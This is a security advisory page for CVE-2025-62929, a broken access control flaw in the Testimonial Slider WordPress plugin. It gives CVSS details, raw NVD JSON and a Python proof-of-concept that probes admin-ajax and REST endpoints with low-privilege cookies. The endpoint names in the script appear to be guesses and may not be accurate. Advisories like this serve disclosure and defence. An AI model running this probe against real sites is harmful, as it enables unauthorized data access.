Security Vulnerability Report
中文
CVE-2025-62929 CVSS 6.5 MEDIUM

CVE-2025-62929

Published: 2025-10-27 02:15:53
Last Modified: 2026-04-27 17:16:35

Description

Missing Authorization vulnerability in PickPlugins Testimonial Slider testimonial allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Testimonial Slider: from n/a through <= 2.0.15.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PickPlugins Testimonial Slider <= 2.0.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62929 PoC - Broken Access Control in Testimonial Slider # Target: WordPress site with PickPlugins Testimonial Slider <= 2.0.15 target = "http://target-wordpress-site.com" # Authenticated low-privilege user session cookies = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_[hash]": "user_session_token" } # Exploit: Access testimonial data without proper authorization # The plugin fails to verify user capabilities before returning data endpoints = [ f"{target}/wp-admin/admin-ajax.php?action=testimonial_slider_get", f"{target}/wp-admin/admin-ajax.php?action=pts_get_testimonials", f"{target}/wp-json/wp/v2/testimonial" ] for endpoint in endpoints: try: response = requests.get(endpoint, cookies=cookies, timeout=10) if response.status_code == 200 and 'testimonial' in response.text.lower(): print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Response preview: {response.text[:500]}") except requests.RequestException as e: print(f"[-] Request failed: {e}") # Note: This PoC demonstrates the broken access control pattern. # Actual exploitation requires valid low-privilege WordPress credentials. # The vulnerability allows unauthorized access to testimonial data retrieval functions. # Patchstack discovered this vulnerability ([email protected])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62929", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:52.613", "lastModified": "2026-04-27T17:16:34.930", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in PickPlugins Testimonial Slider testimonial allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Testimonial Slider: from n/a through <= 2.0.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/testimonial/vulnerability/wordpress-testimonial-slider-plugin-2-0-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}